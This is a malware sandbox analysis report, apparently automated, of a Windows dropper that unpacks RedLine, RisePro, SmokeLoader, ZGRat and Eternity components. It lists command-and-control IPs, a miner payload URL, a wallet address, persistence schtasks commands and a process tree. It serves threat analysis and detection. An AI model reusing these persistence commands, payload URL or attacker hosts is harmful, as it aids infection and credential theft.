eternity | 61afab1517020d59a2db1eaf174cc1acf1a59af7a8515a1b5ea3a0d10a8eac60

Analysis

max time kernel
89s
max time network
183s
platform
windows10-2004_x64
resource
win10v2004-20231127-en
resource tags

arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
submitted
29/11/2023, 13:58 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

61afab1517020d59a2db1eaf174cc1acf1a59af7a8515a1b5ea3a0d10a8eac60.exe
Size

1.7MB
MD5

ed023543b40e9ebaf6cb40da28074173
SHA1

986bd1989695ea88b503f7e40958a17b5c635b0e
SHA256

61afab1517020d59a2db1eaf174cc1acf1a59af7a8515a1b5ea3a0d10a8eac60
SHA512

75629fcd087df7197ff678a1d8b165774486e84129df26ac2ad40f1654804cb043f31816650c74d62252286e9a4644edf54216322c99e68161900957ca180b59
SSDEEP

49152:M/pGRzjjMoZ0NmuCBdOMYVcbCD23Eflux69AJe:qpIEmZUT2Wjm2

Score

10^/10

eternity privateloader redline risepro smokeloader zgrat @ytlogsbot horda livetraffic backdoor infostealer loader persistence rat stealer trojan

Malware Config

Extracted

Family

risepro

194.49.94.152

Extracted

Family

redline

Botnet

horda

194.49.94.152:19053

Extracted

Family

smokeloader

Version

2022

http://194.49.94.210/fks/index.php

rc4.i32

1
0x4b3b02b6

rc4.i32

1
0x6ea683ed

Extracted

Family

redline

Botnet

@ytlogsbot

194.169.175.235:42691

Extracted

Family

redline

Botnet

LiveTraffic

195.10.205.16:2245

Extracted

Family

eternity

Wallets

47vk9PbPuHnEnazCn4tLpwPCWRLSMhpX9PD8WqpjchhTXisimD6j8EvRFDbPQHKUmHVq3vAM3DLytXLg8CqcdRXRFdPe92Q

Attributes

payload_urls
https://raw.githubusercontent.com/VolVeRFM/SilentMiner-VolVeR/main/VolVeRBuilder/Resources/xmrig.exe

Signatures

Detect ZGRat V1 7 IoCs

resource	yara_rule
behavioral1/memory/5576-276-0x0000018268C20000-0x0000018268D04000-memory.dmp	family_zgrat_v1
behavioral1/memory/5576-354-0x0000018268C20000-0x0000018268D00000-memory.dmp	family_zgrat_v1
behavioral1/memory/5576-347-0x0000018268C20000-0x0000018268D00000-memory.dmp	family_zgrat_v1
behavioral1/memory/5576-341-0x0000018268C20000-0x0000018268D00000-memory.dmp	family_zgrat_v1
behavioral1/memory/5576-359-0x0000018268C20000-0x0000018268D00000-memory.dmp	family_zgrat_v1
behavioral1/memory/5576-410-0x0000018268C20000-0x0000018268D00000-memory.dmp	family_zgrat_v1
behavioral1/memory/5576-389-0x0000018268C20000-0x0000018268D00000-memory.dmp	family_zgrat_v1

Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
eternity
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

resource	yara_rule
behavioral1/memory/2956-36-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline
behavioral1/files/0x0007000000023119-64.dat	family_redline
behavioral1/files/0x0007000000023119-66.dat	family_redline
behavioral1/memory/956-70-0x00000000009E0000-0x0000000000A1E000-memory.dmp	family_redline
behavioral1/memory/1704-213-0x0000000002860000-0x000000000289C000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Downloads MZ/PE file

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FANBooster131.lnk	AppLaunch.exe

Executes dropped EXE 10 IoCs

pid	Process
220	Ik2Wz36.exe
1652	qb3yl16.exe
1200	Lr0aA51.exe
3624	1nQ03Ih5.exe
2524	2jT6073.exe
3764	3jL23Ul.exe
1144	4Sj768gn.exe
956	9149.exe
1608	9504.exe
2724	CBC4.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	61afab1517020d59a2db1eaf174cc1acf1a59af7a8515a1b5ea3a0d10a8eac60.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	Ik2Wz36.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	qb3yl16.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	Lr0aA51.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MaxLoonaFest131 = "C:\\Users\\Admin\\AppData\\Local\\MaxLoonaFest131\\MaxLoonaFest131.exe"	AppLaunch.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0009000000023100-48.dat	autoit_exe
behavioral1/files/0x0009000000023100-46.dat	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	AppLaunch.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	AppLaunch.exe
File opened for modification	C:\Windows\System32\GroupPolicy	AppLaunch.exe
File opened for modification	C:\Windows\SysWOW64\GroupPolicy\gpt.ini	AppLaunch.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3624 set thread context of 3940	3624	1nQ03Ih5.exe	97
PID 2524 set thread context of 2956	2524	2jT6073.exe	100

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3jL23Ul.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3jL23Ul.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3jL23Ul.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
6100	schtasks.exe
1988	schtasks.exe
4352	schtasks.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
6484	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3764	3jL23Ul.exe
3764	3jL23Ul.exe
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3764	3jL23Ul.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3292	Process not Found
Token: SeCreatePagefilePrivilege	3292	Process not Found
Token: SeShutdownPrivilege	3292	Process not Found
Token: SeCreatePagefilePrivilege	3292	Process not Found

Suspicious use of FindShellTrayWindow 46 IoCs

pid	Process
1144	4Sj768gn.exe
3292	Process not Found
3292	Process not Found
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
3292	Process not Found
3292	Process not Found
3292	Process not Found
3292	Process not Found
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe

Suspicious use of SendNotifyMessage 40 IoCs

pid	Process
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe
1144	4Sj768gn.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1708 wrote to memory of 220	1708	61afab1517020d59a2db1eaf174cc1acf1a59af7a8515a1b5ea3a0d10a8eac60.exe	92
PID 1708 wrote to memory of 220	1708	61afab1517020d59a2db1eaf174cc1acf1a59af7a8515a1b5ea3a0d10a8eac60.exe	92
PID 1708 wrote to memory of 220	1708	61afab1517020d59a2db1eaf174cc1acf1a59af7a8515a1b5ea3a0d10a8eac60.exe	92
PID 220 wrote to memory of 1652	220	Ik2Wz36.exe	93
PID 220 wrote to memory of 1652	220	Ik2Wz36.exe	93
PID 220 wrote to memory of 1652	220	Ik2Wz36.exe	93
PID 1652 wrote to memory of 1200	1652	qb3yl16.exe	94
PID 1652 wrote to memory of 1200	1652	qb3yl16.exe	94
PID 1652 wrote to memory of 1200	1652	qb3yl16.exe	94
PID 1200 wrote to memory of 3624	1200	Lr0aA51.exe	95
PID 1200 wrote to memory of 3624	1200	Lr0aA51.exe	95
PID 1200 wrote to memory of 3624	1200	Lr0aA51.exe	95
PID 3624 wrote to memory of 3940	3624	1nQ03Ih5.exe	97
PID 3624 wrote to memory of 3940	3624	1nQ03Ih5.exe	97
PID 3624 wrote to memory of 3940	3624	1nQ03Ih5.exe	97
PID 3624 wrote to memory of 3940	3624	1nQ03Ih5.exe	97
PID 3624 wrote to memory of 3940	3624	1nQ03Ih5.exe	97
PID 3624 wrote to memory of 3940	3624	1nQ03Ih5.exe	97
PID 3624 wrote to memory of 3940	3624	1nQ03Ih5.exe	97
PID 3624 wrote to memory of 3940	3624	1nQ03Ih5.exe	97
PID 3624 wrote to memory of 3940	3624	1nQ03Ih5.exe	97
PID 3624 wrote to memory of 3940	3624	1nQ03Ih5.exe	97
PID 1200 wrote to memory of 2524	1200	Lr0aA51.exe	98
PID 1200 wrote to memory of 2524	1200	Lr0aA51.exe	98
PID 1200 wrote to memory of 2524	1200	Lr0aA51.exe	98
PID 2524 wrote to memory of 2956	2524	2jT6073.exe	100
PID 2524 wrote to memory of 2956	2524	2jT6073.exe	100
PID 2524 wrote to memory of 2956	2524	2jT6073.exe	100
PID 2524 wrote to memory of 2956	2524	2jT6073.exe	100
PID 2524 wrote to memory of 2956	2524	2jT6073.exe	100
PID 2524 wrote to memory of 2956	2524	2jT6073.exe	100
PID 2524 wrote to memory of 2956	2524	2jT6073.exe	100
PID 2524 wrote to memory of 2956	2524	2jT6073.exe	100
PID 1652 wrote to memory of 3764	1652	qb3yl16.exe	101
PID 1652 wrote to memory of 3764	1652	qb3yl16.exe	101
PID 1652 wrote to memory of 3764	1652	qb3yl16.exe	101
PID 220 wrote to memory of 1144	220	Ik2Wz36.exe	103
PID 220 wrote to memory of 1144	220	Ik2Wz36.exe	103
PID 220 wrote to memory of 1144	220	Ik2Wz36.exe	103
PID 3940 wrote to memory of 1988	3940	AppLaunch.exe	104
PID 3940 wrote to memory of 1988	3940	AppLaunch.exe	104
PID 3940 wrote to memory of 1988	3940	AppLaunch.exe	104
PID 3940 wrote to memory of 4352	3940	AppLaunch.exe	108
PID 3940 wrote to memory of 4352	3940	AppLaunch.exe	108
PID 3940 wrote to memory of 4352	3940	AppLaunch.exe	108
PID 3292 wrote to memory of 956	3292	Process not Found	110
PID 3292 wrote to memory of 956	3292	Process not Found	110
PID 3292 wrote to memory of 956	3292	Process not Found	110
PID 3292 wrote to memory of 1608	3292	Process not Found	111
PID 3292 wrote to memory of 1608	3292	Process not Found	111
PID 1144 wrote to memory of 1080	1144	4Sj768gn.exe	112
PID 1144 wrote to memory of 1080	1144	4Sj768gn.exe	112
PID 1144 wrote to memory of 1068	1144	4Sj768gn.exe	115
PID 1144 wrote to memory of 1068	1144	4Sj768gn.exe	115
PID 3292 wrote to memory of 2724	3292	Process not Found	114
PID 3292 wrote to memory of 2724	3292	Process not Found	114
PID 3292 wrote to memory of 2724	3292	Process not Found	114
PID 1144 wrote to memory of 3428	1144	4Sj768gn.exe	116
PID 1144 wrote to memory of 3428	1144	4Sj768gn.exe	116
PID 1144 wrote to memory of 1372	1144	4Sj768gn.exe	117
PID 1144 wrote to memory of 1372	1144	4Sj768gn.exe	117
PID 1144 wrote to memory of 1644	1144	4Sj768gn.exe	118
PID 1144 wrote to memory of 1644	1144	4Sj768gn.exe	118
PID 1144 wrote to memory of 4724	1144	4Sj768gn.exe	119

C:\Users\Admin\AppData\Local\Temp\61afab1517020d59a2db1eaf174cc1acf1a59af7a8515a1b5ea3a0d10a8eac60.exe
"C:\Users\Admin\AppData\Local\Temp\61afab1517020d59a2db1eaf174cc1acf1a59af7a8515a1b5ea3a0d10a8eac60.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1708
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ik2Wz36.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ik2Wz36.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:220
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\qb3yl16.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\qb3yl16.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:1652
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Lr0aA51.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Lr0aA51.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:1200
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nQ03Ih5.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nQ03Ih5.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3624
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        Drops startup file
        Adds Run key to start application
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:3940
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:1988
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:4352
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2jT6073.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2jT6073.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2524
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:2956
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3jL23Ul.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3jL23Ul.exe
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:3764
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Sj768gn.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Sj768gn.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1144
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
      4⤵
      PID:1080
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff81dec46f8,0x7ff81dec4708,0x7ff81dec4718
        5⤵
        
        PID:4740
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,12490273789474613312,7891463978136203472,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
        5⤵
        
        PID:6572
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,12490273789474613312,7891463978136203472,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
        5⤵
        
        PID:6564
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
      4⤵
      PID:1068
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff81dec46f8,0x7ff81dec4708,0x7ff81dec4718
        5⤵
        
        PID:3540
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,11495012805576625939,16090855621438757832,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
        5⤵
        
        PID:6336
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,11495012805576625939,16090855621438757832,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
        5⤵
        
        PID:7080
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
      4⤵
      PID:3428
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff81dec46f8,0x7ff81dec4708,0x7ff81dec4718
        5⤵
        
        PID:3424
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,1387830913579763227,1376300343279694212,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
        5⤵
        
        PID:7336
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,1387830913579763227,1376300343279694212,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2036 /prefetch:2
        5⤵
        
        PID:7328
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login
      4⤵
      PID:1372
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x108,0x16c,0x7ff81dec46f8,0x7ff81dec4708,0x7ff81dec4718
        5⤵
        
        PID:1972
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,5081141583332192373,15970114256181005121,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
        5⤵
        
        PID:6412
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,5081141583332192373,15970114256181005121,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
        5⤵
        
        PID:6396
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
      4⤵
      PID:1644
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff81dec46f8,0x7ff81dec4708,0x7ff81dec4718
        5⤵
        
        PID:3836
